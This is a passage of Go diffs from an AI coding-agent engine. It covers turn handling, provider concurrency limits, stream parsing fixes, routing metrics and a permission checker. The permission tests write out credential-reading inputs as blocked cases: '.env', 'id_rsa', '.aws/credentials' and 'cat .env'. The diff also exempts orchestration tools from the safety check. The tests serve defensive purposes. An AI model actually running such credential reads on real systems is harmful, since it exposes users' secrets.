			newEventStream(message.StopEndTurn, "model",
				stream.Event{Type: stream.EventTextDelta, Text: "Done."},
			),
		},
	}
	win := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
	eng, _ := New(Config{
		Provider: mp,
		Tools:    reg,
		Context:  win,
	})
	if _, err := eng.Submit(context.Background(), "list files", nil); err != nil {
		t.Fatalf("Submit: %v", err)
	}
	all := win.AllMessages()
	if len(all) < 4 {
		t.Errorf("context window has %d messages, want at least 4 (user+assistant+tool_results+assistant)", len(all))
		for i, m := range all {
			t.Logf(" [%d] role=%s content=%s", i, m.Role, m.TextContent())
		}
	}
	// The conversation must start with the submitted user message.
	if len(all) > 0 && all[0].Role != message.RoleUser {
		t.Errorf("allMsgs[0].Role = %q, want user", all[0].Role)
	}
}
// The tracker must be set from the round's reported usage (InputTokens +
// OutputTokens), not accumulated across rounds.
func TestSubmit_TrackerReflectsInputTokens(t *testing.T) {
	win := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
	mp := &mockProvider{
		name: "test",
		streams: []stream.Stream{
			newEventStream(message.StopEndTurn, "",
				stream.Event{Type: stream.EventUsage, Usage: &message.Usage{InputTokens: 100, OutputTokens: 50}},
				stream.Event{Type: stream.EventTextDelta, Text: "a"},
			),
		},
	}
	eng, _ := New(Config{Provider: mp, Tools: tool.NewRegistry(), Context: win})
	eng.Submit(context.Background(), "hi", nil)
	// 100 + 50 = 150, nothing more.
	if used := win.Tracker().Used(); used != 150 {
		t.Errorf("tracker = %d, want 150 (InputTokens+OutputTokens, not cumulative)", used)
	}
}
func TestSubmit_CumulativeUsage(t *testing.T) {
mp := &mockProvider{
name: "test",

View File

@@ -2,7 +2,6 @@ package engine
import (
"context"
"encoding/json"
"errors"
"fmt"
"sync"
@@ -20,8 +19,19 @@ import (
// Submit sends a user message and runs the agentic loop to completion.
// The callback receives real-time streaming events.
// It is SubmitWithOptions with zero-value (default) per-turn options.
func (e *Engine) Submit(ctx context.Context, input string, cb Callback) (*Turn, error) {
	var defaults TurnOptions
	return e.SubmitWithOptions(ctx, input, defaults, cb)
}
// SubmitWithOptions is like Submit but applies per-turn overrides (e.g. ToolChoice).
// The overrides are cleared again when the turn finishes, success or error.
func (e *Engine) SubmitWithOptions(ctx context.Context, input string, opts TurnOptions, cb Callback) (*Turn, error) {
	e.turnOpts = opts
	defer func() { e.turnOpts = TurnOptions{} }()
	// Record the user message in both the engine history and, when configured,
	// the context window so compaction sees the same conversation.
	msg := message.NewUserText(input)
	e.history = append(e.history, msg)
	if win := e.cfg.Context; win != nil {
		win.AppendMessage(msg)
	}
	return e.runLoop(ctx, cb)
}
@@ -29,6 +39,11 @@ func (e *Engine) Submit(ctx context.Context, input string, cb Callback) (*Turn,
// SubmitMessages is like Submit but accepts pre-built messages.
func (e *Engine) SubmitMessages(ctx context.Context, msgs []message.Message, cb Callback) (*Turn, error) {
	e.history = append(e.history, msgs...)
	// Mirror each message into the context window when one is configured.
	if win := e.cfg.Context; win != nil {
		for _, m := range msgs {
			win.AppendMessage(m)
		}
	}
	return e.runLoop(ctx, cb)
}
@@ -48,6 +63,7 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Route and stream
var s stream.Stream
var err error
var decision router.RoutingDecision
if e.cfg.Router != nil {
// Classify task from the latest user message
@@ -59,7 +75,7 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
}
}
task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000 // rough default
task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
e.logger.Debug("routing request",
"task_type", task.Type,
@@ -67,13 +83,12 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
"round", turn.Rounds,
)
var arm *router.Arm
s, arm, err = e.cfg.Router.Stream(ctx, task, req)
if arm != nil {
s, decision, err = e.cfg.Router.Stream(ctx, task, req)
if decision.Arm != nil {
e.logger.Debug("streaming request",
"provider", arm.Provider.Name(),
"model", arm.ModelName,
"arm", arm.ID,
"provider", decision.Arm.Provider.Name(),
"model", decision.Arm.ModelName,
"arm", decision.Arm.ID,
"messages", len(req.Messages),
"tools", len(req.Tools),
"round", turn.Rounds,
@@ -101,9 +116,11 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
}
}
task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000
s, _, retryErr := e.cfg.Router.Stream(ctx, task, req)
return s, retryErr
task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
var retryDecision router.RoutingDecision
s, retryDecision, err = e.cfg.Router.Stream(ctx, task, req)
decision = retryDecision // adopt new reservation on retry
return s, err
}
return e.cfg.Provider.Stream(ctx, req)
})
@@ -111,20 +128,30 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Try reactive compaction on 413 (request too large)
s, err = e.handleRequestTooLarge(ctx, err, req)
if err != nil {
decision.Rollback()
return nil, fmt.Errorf("provider stream: %w", err)
}
}
}
// Consume stream, forwarding events to callback
// Consume stream, forwarding events to callback.
// Track TTFT and stream duration for arm performance metrics.
acc := stream.NewAccumulator()
var stopReason message.StopReason
var model string
streamStart := time.Now()
var firstTokenAt time.Time
for s.Next() {
evt := s.Current()
acc.Apply(evt)
// Record time of first text token for TTFT metric
if firstTokenAt.IsZero() && evt.Type == stream.EventTextDelta && evt.Text != "" {
firstTokenAt = time.Now()
}
// Capture stop reason and model from events
if evt.StopReason != "" {
stopReason = evt.StopReason
@@ -137,14 +164,28 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
cb(evt)
}
}
streamEnd := time.Now()
if err := s.Err(); err != nil {
s.Close()
decision.Rollback()
return nil, fmt.Errorf("stream error: %w", err)
}
s.Close()
// Build response
resp := acc.Response(stopReason, model)
// Commit pool reservation and record perf metrics for this round.
actualTokens := int(resp.Usage.InputTokens + resp.Usage.OutputTokens)
decision.Commit(actualTokens)
if decision.Arm != nil && !firstTokenAt.IsZero() {
decision.Arm.Perf.Update(
firstTokenAt.Sub(streamStart),
int(resp.Usage.OutputTokens),
streamEnd.Sub(streamStart),
)
}
turn.Usage.Add(resp.Usage)
turn.Messages = append(turn.Messages, resp.Message)
e.history = append(e.history, resp.Message)
@@ -152,7 +193,14 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Track in context window and check for compaction
if e.cfg.Context != nil {
e.cfg.Context.Append(resp.Message, resp.Usage)
e.cfg.Context.AppendMessage(resp.Message)
// Set tracker to the provider-reported context size (InputTokens = full context
// as sent this round). This avoids double-counting InputTokens across rounds.
if resp.Usage.InputTokens > 0 {
e.cfg.Context.Tracker().Set(resp.Usage.InputTokens + resp.Usage.OutputTokens)
} else {
e.cfg.Context.Tracker().Add(message.Usage{OutputTokens: resp.Usage.OutputTokens})
}
if compacted, err := e.cfg.Context.CompactIfNeeded(); err != nil {
e.logger.Error("context compaction failed", "error", err)
} else if compacted {
@@ -169,9 +217,19 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Decide next action
switch resp.StopReason {
case message.StopEndTurn, message.StopMaxTokens, message.StopSequence:
case message.StopEndTurn, message.StopSequence:
return turn, nil
case message.StopMaxTokens:
// Model hit its output token budget mid-response. Inject a continue prompt
// and re-query so the response is completed rather than silently truncated.
contMsg := message.NewUserText("Continue from where you left off.")
e.history = append(e.history, contMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(contMsg)
}
// Continue loop — next round will resume generation
case message.StopToolUse:
results, err := e.executeTools(ctx, resp.Message.ToolCalls(), cb)
if err != nil {
@@ -180,6 +238,9 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
toolMsg := message.NewToolResults(results...)
turn.Messages = append(turn.Messages, toolMsg)
e.history = append(e.history, toolMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(toolMsg)
}
// Continue loop — re-query provider with tool results
default:
@@ -205,12 +266,15 @@ func (e *Engine) buildRequest(ctx context.Context) provider.Request {
Model: e.cfg.Model,
SystemPrompt: systemPrompt,
Messages: messages,
ToolChoice: e.turnOpts.ToolChoice,
}
// Only include tools if the model supports them
// Only include tools if the model supports them.
// When Router is active, skip capability gating — the router selects the arm
// and already knows its capabilities. Gating here would use the wrong provider.
caps := e.resolveCapabilities(ctx)
if caps == nil || caps.ToolUse {
// nil caps = unknown model, include tools optimistically
if e.cfg.Router != nil || caps == nil || caps.ToolUse {
// Router active, nil caps (unknown model), or model supports tools
for _, t := range e.cfg.Tools.All() {
// Skip deferred tools until the model requests them
if dt, ok := t.(tool.DeferrableTool); ok && dt.ShouldDefer() && !e.activatedTools[t.Name()] {
@@ -352,10 +416,11 @@ func (e *Engine) executeSingleTool(ctx context.Context, call message.ToolCall, t
}
func truncate(s string, maxLen int) string {
if len(s) <= maxLen {
runes := []rune(s)
if len(runes) <= maxLen {
return s
}
return s[:maxLen] + "..."
return string(runes[:maxLen]) + "..."
}
// handleRequestTooLarge attempts compaction on 413 and retries once.
@@ -387,7 +452,7 @@ func (e *Engine) handleRequestTooLarge(ctx context.Context, origErr error, req p
}
}
task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000
task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
s, _, err := e.cfg.Router.Stream(ctx, task, req)
return s, err
}
@@ -441,12 +506,3 @@ func (e *Engine) retryOnTransient(ctx context.Context, firstErr error, fn func()
return nil, firstErr
}
// toolDefFromTool converts a tool.Tool to provider.ToolDefinition.
// Unused currently but kept for reference when building tool definitions dynamically.
func toolDefFromJSON(name, description string, params json.RawMessage) provider.ToolDefinition {
return provider.ToolDefinition{
Name: name,
Description: description,
Parameters: params,
}
}

View File

@@ -6,6 +6,7 @@ import (
"errors"
"fmt"
"strings"
"sync"
)
var ErrDenied = errors.New("permission denied")
@@ -31,6 +32,7 @@ type ToolInfo struct {
// 5. Mode-specific behavior
// 6. Prompt user if needed
type Checker struct {
mu sync.RWMutex
mode Mode
rules []Rule
promptFn PromptFunc
@@ -53,22 +55,47 @@ func NewChecker(mode Mode, rules []Rule, promptFn PromptFunc) *Checker {
// SetPromptFunc replaces the prompt function (e.g., switching from pipe to TUI prompt).
// The write is guarded by the checker's mutex so an in-flight Check sees either
// the old or the new function, never a torn value.
func (c *Checker) SetPromptFunc(fn PromptFunc) {
	c.mu.Lock()
	defer c.mu.Unlock()
	c.promptFn = fn
}
// SetMode changes the active permission mode.
// Mutex-guarded because the TUI goroutine can switch modes while an engine
// goroutine is concurrently inside Check on the same Checker.
func (c *Checker) SetMode(mode Mode) {
	c.mu.Lock()
	defer c.mu.Unlock()
	c.mode = mode
}
// Mode returns the current permission mode.
// Takes the read lock so the returned value is consistent even while SetMode
// runs concurrently.
func (c *Checker) Mode() Mode {
	c.mu.RLock()
	defer c.mu.RUnlock()
	return c.mode
}
// WithDenyPrompt derives a prompt-less copy of the checker: mode, rules and
// safety patterns are carried over, but promptFn is left nil so any tool call
// that would normally require human approval is auto-denied. Intended for elf
// engines that run without a TUI to prompt.
func (c *Checker) WithDenyPrompt() *Checker {
	c.mu.RLock()
	// Snapshot shared state under the read lock; promptFn stays its zero
	// value (nil), which is what makes the copy auto-deny on prompt.
	clone := Checker{
		mode:               c.mode,
		rules:              c.rules,
		safetyDenyPatterns: c.safetyDenyPatterns,
	}
	c.mu.RUnlock()
	return &clone
}
// Check evaluates whether a tool call is permitted.
// Returns nil if allowed, ErrDenied if denied.
func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage) error {
c.mu.RLock()
mode := c.mode
promptFn := c.promptFn
c.mu.RUnlock()
// Step 1: Rule-based deny gates (bypass-immune)
if c.matchesRule(info.Name, args, ActionDeny) {
return fmt.Errorf("%w: deny rule matched for %s", ErrDenied, info.Name)
@@ -87,7 +114,7 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
}
// Step 3: Mode-based bypass
if c.mode == ModeBypass {
if mode == ModeBypass {
return nil
}
@@ -97,7 +124,7 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
}
// Step 5: Mode-specific behavior
switch c.mode {
switch mode {
case ModeDeny:
return fmt.Errorf("%w: deny mode, no allow rule for %s", ErrDenied, info.Name)
@@ -128,8 +155,24 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
// Always prompt
}
// Step 6: Prompt user
return c.prompt(ctx, info.Name, args)
// Step 6: Prompt user (using snapshot of promptFn taken before lock release)
if promptFn == nil {
// No prompt handler (e.g. elf sub-agent): auto-allow non-destructive fs
// operations so elfs can write files in auto/acceptEdits modes. Deny
// everything else that would normally require human approval.
if strings.HasPrefix(info.Name, "fs.") && !info.IsDestructive {
return nil
}
return fmt.Errorf("%w: no prompt handler for %s", ErrDenied, info.Name)
}
approved, err := promptFn(ctx, info.Name, args)
if err != nil {
return fmt.Errorf("permission prompt: %w", err)
}
if !approved {
return fmt.Errorf("%w: user denied %s", ErrDenied, info.Name)
}
return nil
}
func (c *Checker) matchesRule(toolName string, args json.RawMessage, action Action) bool {
@@ -152,9 +195,26 @@ func (c *Checker) matchesRule(toolName string, args json.RawMessage, action Acti
}
func (c *Checker) safetyCheck(toolName string, args json.RawMessage) error {
argsStr := string(args)
// Orchestration tools (spawn_elfs, agent) carry elf PROMPTS as args — arbitrary
// instruction text that may legitimately mention .env, credentials, etc.
// Security is enforced inside each spawned elf when it actually accesses files.
if toolName == "spawn_elfs" || toolName == "agent" {
return nil
}
// For fs.* tools, only check the path field — not content being written.
// Prevents false-positives when writing docs that reference .env, .ssh, etc.
checkStr := string(args)
if strings.HasPrefix(toolName, "fs.") {
var parsed struct {
Path string `json:"path"`
}
if err := json.Unmarshal(args, &parsed); err == nil && parsed.Path != "" {
checkStr = parsed.Path
}
}
for _, pattern := range c.safetyDenyPatterns {
if strings.Contains(argsStr, pattern) {
if strings.Contains(checkStr, pattern) {
return fmt.Errorf("%w: safety check blocked access to %q via %s", ErrDenied, pattern, toolName)
}
}
@@ -184,18 +244,3 @@ func (c *Checker) checkCompoundCommand(ctx context.Context, info ToolInfo, args
return nil
}
func (c *Checker) prompt(ctx context.Context, toolName string, args json.RawMessage) error {
if c.promptFn == nil {
// No prompt function — deny by default
return fmt.Errorf("%w: no prompt handler for %s", ErrDenied, toolName)
}
approved, err := c.promptFn(ctx, toolName, args)
if err != nil {
return fmt.Errorf("permission prompt: %w", err)
}
if !approved {
return fmt.Errorf("%w: user denied %s", ErrDenied, toolName)
}
return nil
}

View File

@@ -110,6 +110,30 @@ func TestChecker_AcceptEditsMode(t *testing.T) {
}
}
func TestChecker_ElfNilPrompt_FsWriteAllowed(t *testing.T) {
	// Elfs use WithDenyPrompt (nil promptFn). Non-destructive fs ops must still
	// be allowed so elfs can write files in auto/acceptEdits modes.
	c := NewChecker(ModeAuto, nil, nil) // nil promptFn simulates elf checker
	ctx := context.Background()

	// Non-destructive fs.write: allowed
	if err := c.Check(ctx, ToolInfo{Name: "fs.write"}, json.RawMessage(`{"path":"AGENTS.md"}`)); err != nil {
		t.Errorf("elf should be able to write files: %v", err)
	}
	// Destructive fs op: denied
	if err := c.Check(ctx, ToolInfo{Name: "fs.delete", IsDestructive: true}, json.RawMessage(`{"path":"foo"}`)); !errors.Is(err, ErrDenied) {
		t.Error("destructive fs op should be denied without prompt handler")
	}
	// bash: denied
	if err := c.Check(ctx, ToolInfo{Name: "bash"}, json.RawMessage(`{"command":"echo hi"}`)); !errors.Is(err, ErrDenied) {
		t.Error("bash should be denied without prompt handler")
	}
}
func TestChecker_AutoMode(t *testing.T) {
c := NewChecker(ModeAuto, nil, func(_ context.Context, _ string, _ json.RawMessage) (bool, error) {
return true, nil // approve prompt
@@ -148,23 +172,68 @@ func TestChecker_SafetyCheck(t *testing.T) {
// Safety checks are bypass-immune
c := NewChecker(ModeBypass, nil, nil)
tests := []struct {
name string
args string
blocked := []struct {
name string
toolName string
args string
}{
{"env file", `{"path":".env"}`},
{"git dir", `{"path":".git/config"}`},
{"ssh key", `{"path":"id_rsa"}`},
{"aws creds", `{"path":".aws/credentials"}`},
{"env file", "fs.read", `{"path":".env"}`},
{"git dir", "fs.read", `{"path":".git/config"}`},
{"ssh key", "fs.read", `{"path":"id_rsa"}`},
{"aws creds", "fs.read", `{"path":".aws/credentials"}`},
{"bash env", "bash", `{"command":"cat .env"}`},
}
for _, tt := range tests {
for _, tt := range blocked {
t.Run(tt.name, func(t *testing.T) {
err := c.Check(context.Background(), ToolInfo{Name: "fs.read"}, json.RawMessage(tt.args))
err := c.Check(context.Background(), ToolInfo{Name: tt.toolName}, json.RawMessage(tt.args))
if !errors.Is(err, ErrDenied) {
t.Errorf("safety check should block: %v", err)
}
})
}
// Writing a file whose *content* mentions .env (e.g. AGENTS.md docs) must not be blocked.
t.Run("env mention in content not blocked", func(t *testing.T) {
args := json.RawMessage(`{"path":"AGENTS.md","content":"Copy .env.example to .env and fill in the values."}`)
err := c.Check(context.Background(), ToolInfo{Name: "fs.write"}, args)
if err != nil {
t.Errorf("fs.write to safe path should not be blocked by content mention: %v", err)
}
})
}
func TestChecker_SafetyCheck_OrchestrationToolsExempt(t *testing.T) {
	// spawn_elfs and agent carry elf PROMPT TEXT as args — arbitrary instruction
	// text that may legitimately mention .env, credentials, etc.
	// Security is enforced inside each spawned elf, not at the orchestration layer.
	c := NewChecker(ModeBypass, nil, nil)
	ctx := context.Background()

	exempt := []struct {
		name     string
		toolName string
		args     string
	}{
		{"spawn_elfs with .env mention", "spawn_elfs", `{"tasks":[{"task":"check .env config","elf":"worker"}]}`},
		{"spawn_elfs with credentials mention", "spawn_elfs", `{"tasks":[{"task":"read credentials file","elf":"worker"}]}`},
		{"agent with .env mention", "agent", `{"prompt":"verify .env is configured correctly"}`},
		{"agent with ssh mention", "agent", `{"prompt":"check .ssh/config for proxy settings"}`},
	}
	for _, tc := range exempt {
		t.Run(tc.name, func(t *testing.T) {
			if err := c.Check(ctx, ToolInfo{Name: tc.toolName}, json.RawMessage(tc.args)); err != nil {
				t.Errorf("orchestration tool %q should not be blocked by safety check: %v", tc.toolName, err)
			}
		})
	}

	// Non-orchestration tools with the same patterns are still blocked.
	t.Run("bash with .env still blocked", func(t *testing.T) {
		if err := c.Check(ctx, ToolInfo{Name: "bash"}, json.RawMessage(`{"command":"cat .env"}`)); !errors.Is(err, ErrDenied) {
			t.Errorf("bash accessing .env should still be blocked: %v", err)
		}
	})
}
func TestChecker_CompoundCommand(t *testing.T) {
@@ -233,3 +302,26 @@ func TestChecker_SetMode(t *testing.T) {
t.Errorf("mode should be plan after SetMode")
}
}
func TestChecker_ConcurrentSetModeAndCheck(t *testing.T) {
	// Verifies no data race between SetMode (TUI goroutine) and Check (engine goroutine).
	// Run with: go test -race ./internal/permission/...
	c := NewChecker(ModeDefault, nil, nil)
	ctx := context.Background()
	info := ToolInfo{Name: "bash", IsReadOnly: true}
	args := json.RawMessage(`{}`)

	const iterations = 1000
	writerDone := make(chan struct{})
	go func() {
		for i := 0; i < iterations; i++ {
			c.SetMode(ModeAuto)
			c.SetMode(ModeDefault)
		}
		close(writerDone)
	}()
	for i := 0; i < iterations; i++ {
		c.Check(ctx, info, args) //nolint:errcheck
	}
	<-writerDone
}

View File

@@ -0,0 +1,57 @@
package provider
import (
"context"
"sync"
"somegit.dev/Owlibou/gnoma/internal/stream"
)
// ConcurrentProvider wraps a Provider with a shared semaphore that limits the
// number of in-flight Stream calls. All engines sharing the same
// ConcurrentProvider instance share the same concurrency budget.
type ConcurrentProvider struct {
	Provider // inner provider; all methods other than Stream are delegated as-is

	// sem is a counting semaphore: created full (one token per allowed
	// in-flight call), Stream receives a token to start and the returned
	// stream's Close sends it back.
	sem chan struct{}
}
// WithConcurrency wraps p so that at most max Stream calls can be in-flight
// simultaneously. If max <= 0, p is returned unwrapped (no limiting).
func WithConcurrency(p Provider, max int) Provider {
	if max <= 0 {
		return p
	}
	// Build the counting semaphore pre-filled: each token in the channel is
	// one available slot, so the first max acquisitions succeed immediately.
	slots := make(chan struct{}, max)
	for i := 0; i < max; i++ {
		slots <- struct{}{}
	}
	return &ConcurrentProvider{Provider: p, sem: slots}
}
// Stream blocks until a concurrency slot is free (or ctx is cancelled), then
// delegates to the wrapped provider. The slot travels with the returned stream
// and is given back when its Close method runs.
func (cp *ConcurrentProvider) Stream(ctx context.Context, req Request) (stream.Stream, error) {
	// Acquire: take a token from the semaphore, or bail out on cancellation.
	select {
	case <-ctx.Done():
		return nil, ctx.Err()
	case <-cp.sem:
	}
	inner, err := cp.Provider.Stream(ctx, req)
	if err != nil {
		// No stream materialized — return the token immediately.
		cp.sem <- struct{}{}
		return nil, err
	}
	giveBack := func() { cp.sem <- struct{}{} }
	return &semStream{Stream: inner, release: giveBack}, nil
}
// semStream wraps a stream.Stream to release a semaphore slot on Close.
type semStream struct {
	stream.Stream // delegate; Next/Current/Err pass through untouched

	release func() // returns the slot to the owning ConcurrentProvider
	once sync.Once // ensures release runs at most once even if Close is called repeatedly
}

// Close releases the concurrency slot exactly once, then closes the underlying
// stream. Safe to call multiple times.
func (s *semStream) Close() error {
	s.once.Do(s.release)
	return s.Stream.Close()
}

View File

@@ -15,13 +15,20 @@ const defaultModel = "gpt-4o"
// Provider implements provider.Provider for the OpenAI API.
type Provider struct {
client *oai.Client
name string
model string
client *oai.Client
name string
model string
streamOpts []option.RequestOption // injected per-request (e.g. think:false for Ollama)
}
// New creates an OpenAI provider from config.
func New(cfg provider.ProviderConfig) (provider.Provider, error) {
return NewWithStreamOptions(cfg, nil)
}
// NewWithStreamOptions creates an OpenAI provider with extra per-request stream options.
// Use this for Ollama/llama.cpp adapters that need non-standard body fields.
func NewWithStreamOptions(cfg provider.ProviderConfig, streamOpts []option.RequestOption) (provider.Provider, error) {
if cfg.APIKey == "" {
return nil, fmt.Errorf("openai: api key required")
}
@@ -41,9 +48,10 @@ func New(cfg provider.ProviderConfig) (provider.Provider, error) {
}
return &Provider{
client: &client,
name: "openai",
model: model,
client: &client,
name: "openai",
model: model,
streamOpts: streamOpts,
}, nil
}
@@ -57,7 +65,7 @@ func (p *Provider) Stream(ctx context.Context, req provider.Request) (stream.Str
params := translateRequest(req)
params.Model = model
raw := p.client.Chat.Completions.NewStreaming(ctx, params)
raw := p.client.Chat.Completions.NewStreaming(ctx, params, p.streamOpts...)
return newOpenAIStream(raw), nil
}

View File

@@ -25,9 +25,10 @@ type openaiStream struct {
}
type toolCallState struct {
id string
name string
args string
id string
name string
args string
argsComplete bool // true when args arrived in the initial chunk; skip subsequent deltas
}
func newOpenAIStream(raw *ssestream.Stream[oai.ChatCompletionChunk]) *openaiStream {
@@ -74,9 +75,10 @@ func (s *openaiStream) Next() bool {
if !ok {
// New tool call — capture initial arguments too
existing = &toolCallState{
id: tc.ID,
name: tc.Function.Name,
args: tc.Function.Arguments,
id: tc.ID,
name: tc.Function.Name,
args: tc.Function.Arguments,
argsComplete: tc.Function.Arguments != "",
}
s.toolCalls[tc.Index] = existing
s.hadToolCalls = true
@@ -91,8 +93,11 @@ func (s *openaiStream) Next() bool {
}
}
// Accumulate arguments (subsequent chunks)
if tc.Function.Arguments != "" && ok {
// Accumulate arguments (subsequent chunks).
// Skip if args were already provided in the initial chunk — some providers
// (e.g. Ollama) send complete args in the name chunk and then repeat them
// as a delta, which would cause doubled JSON and unmarshal failures.
if tc.Function.Arguments != "" && ok && !existing.argsComplete {
existing.args += tc.Function.Arguments
s.cur = stream.Event{
Type: stream.EventToolCallDelta,
@@ -113,6 +118,29 @@ func (s *openaiStream) Next() bool {
}
return true
}
// Ollama thinking content — non-standard "thinking" or "reasoning" field on the delta.
// Ollama uses "reasoning"; some other servers use "thinking".
// The openai-go struct drops unknown fields, so we read the raw JSON directly.
if raw := delta.RawJSON(); raw != "" {
var extra struct {
Thinking string `json:"thinking"`
Reasoning string `json:"reasoning"`
}
if json.Unmarshal([]byte(raw), &extra) == nil {
text := extra.Thinking
if text == "" {
text = extra.Reasoning
}
if text != "" {
s.cur = stream.Event{
Type: stream.EventThinkingDelta,
Text: text,
}
return true
}
}
}
}
// Stream ended — flush tool call Done events, then emit stop

View File

@@ -20,6 +20,10 @@ func unsanitizeToolName(name string) string {
if strings.HasPrefix(name, "fs_") {
return "fs." + name[3:]
}
// Some models (e.g. gemma4 via Ollama) use "fs:grep" instead of "fs_grep"
if strings.HasPrefix(name, "fs:") {
return "fs." + name[3:]
}
return name
}
@@ -127,6 +131,12 @@ func translateRequest(req provider.Request) oai.ChatCompletionNewParams {
IncludeUsage: param.NewOpt(true),
}
if req.ToolChoice != "" && len(params.Tools) > 0 {
params.ToolChoice = oai.ChatCompletionToolChoiceOptionUnionParam{
OfAuto: param.NewOpt(string(req.ToolChoice)),
}
}
return params
}

View File

@@ -8,6 +8,15 @@ import (
"somegit.dev/Owlibou/gnoma/internal/stream"
)
// ToolChoiceMode controls how the model selects tools.
// It is translated into the provider's tool-choice request field; the zero
// value "" leaves the provider's default behavior (usually auto) in place.
type ToolChoiceMode string

const (
	ToolChoiceAuto ToolChoiceMode = "auto" // model decides whether to call tools
	ToolChoiceRequired ToolChoiceMode = "required" // model must call at least one tool
	ToolChoiceNone ToolChoiceMode = "none" // model must answer without calling tools
)
// Request encapsulates everything needed for a single LLM API call.
type Request struct {
Model string
@@ -21,6 +30,7 @@ type Request struct {
StopSequences []string
Thinking *ThinkingConfig
ResponseFormat *ResponseFormat
ToolChoice ToolChoiceMode // "" = provider default (auto)
}
// ToolDefinition is the provider-agnostic tool schema.

View File

@@ -1,5 +1,7 @@
package provider
import "math"
// RateLimits describes the rate limits for a provider+model pair.
// Zero values mean "no limit" or "unknown".
type RateLimits struct {
@@ -13,6 +15,31 @@ type RateLimits struct {
SpendCap float64 // monthly spend cap in provider currency
}
// MaxConcurrent returns the maximum number of concurrent in-flight requests
// that this rate limit allows. Returns 0 when there is no meaningful concurrency
// constraint (provider has high or unknown limits).
func (rl RateLimits) MaxConcurrent() int {
	switch {
	case rl.RPS > 0:
		// Per-second limits map directly: one slot per request-per-second,
		// rounded up, never below one.
		slots := int(math.Ceil(rl.RPS))
		if slots < 1 {
			slots = 1
		}
		return slots
	case rl.RPM > 0:
		// Per-minute limits use a conservative heuristic of one slot per
		// 30 RPM, clamped to the range [1, 16].
		slots := rl.RPM / 30
		if slots < 1 {
			slots = 1
		}
		if slots > 16 {
			slots = 16
		}
		return slots
	default:
		return 0
	}
}
// ProviderDefaults holds default rate limits keyed by model glob.
// The special key "*" matches any model not explicitly listed.
type ProviderDefaults struct {

View File

@@ -1,6 +1,9 @@
package router
import (
"sync"
"time"
"somegit.dev/Owlibou/gnoma/internal/provider"
)
@@ -19,6 +22,9 @@ type Arm struct {
// Cost per 1k tokens (EUR, estimated)
CostPer1kInput float64
CostPer1kOutput float64
// Live performance metrics, updated after each completed request.
Perf ArmPerf
}
// NewArmID creates an arm ID from provider name and model.
@@ -39,9 +45,38 @@ func (a *Arm) SupportsTools() bool {
return a.Capabilities.ToolUse
}
// ArmPerf holds live performance metrics for an arm.
// perfAlpha is the EMA smoothing factor for ArmPerf updates (0.3 = ~3-sample memory).
const perfAlpha = 0.3
// ArmPerf tracks live performance metrics using an exponential moving average.
// Updated after each completed stream. Safe for concurrent use.
type ArmPerf struct {
TTFT_P50_ms float64 // time to first token, p50
TTFT_P95_ms float64 // time to first token, p95
ToksPerSec float64 // tokens per second throughput
mu sync.Mutex
TTFTMs float64 // time to first token, EMA in milliseconds
ToksPerSec float64 // output throughput, EMA in tokens/second
Samples int // total observations recorded
}
// Update records a single observation into the EMA.
// ttft: elapsed time from stream start to first text token.
// outputTokens: tokens generated in this response.
// streamDuration: total time the stream was active (first call to last event).
//
// The first sample seeds the EMA directly; subsequent samples are blended with
// weight perfAlpha. Safe for concurrent use (guarded by p.mu).
func (p *ArmPerf) Update(ttft time.Duration, outputTokens int, streamDuration time.Duration) {
	p.mu.Lock()
	defer p.mu.Unlock()

	// Keep sub-millisecond precision: Duration.Milliseconds() truncates to a
	// whole integer, which would record very fast first tokens (local models)
	// as 0 ms and drag the EMA toward zero.
	ttftMs := float64(ttft) / float64(time.Millisecond)

	// Throughput is undefined for a zero-length stream; record 0 rather than
	// dividing by zero.
	var tps float64
	if streamDuration > 0 {
		tps = float64(outputTokens) / streamDuration.Seconds()
	}

	if p.Samples == 0 {
		p.TTFTMs = ttftMs
		p.ToksPerSec = tps
	} else {
		p.TTFTMs = perfAlpha*ttftMs + (1-perfAlpha)*p.TTFTMs
		p.ToksPerSec = perfAlpha*tps + (1-perfAlpha)*p.ToksPerSec
	}
	p.Samples++
}

View File

@@ -6,6 +6,7 @@ import (
"fmt"
"log/slog"
"net/http"
"strings"
"time"
"somegit.dev/Owlibou/gnoma/internal/provider"
@@ -15,10 +16,37 @@ const discoveryTimeout = 5 * time.Second
// DiscoveredModel represents a model found via discovery.
type DiscoveredModel struct {
ID string
Name string
Provider string // "ollama" or "llamacpp"
Size int64 // bytes, if available
ID string
Name string
Provider string // "ollama" or "llamacpp"
Size int64 // bytes, if available
SupportsTools bool // whether the model supports function/tool calling
ContextSize int // context window in tokens (0 = unknown, use default)
}
// toolSupportedModelPrefixes lists known model families that support tool/function calling.
// This is a conservative allowlist — unknown models default to no tool support.
var toolSupportedModelPrefixes = []string{
	"mistral", "mixtral", "codestral",
	"llama3", "llama-3",
	"qwen2", "qwen-2", "qwen2.5",
	"command-r",
	"functionary",
	"hermes",
	"firefunction",
	"nexusraven",
	"groq-tool",
}

// inferToolSupport reports whether modelName looks like a model family known to
// handle tool/function calling. Matching is case-insensitive and substring-based,
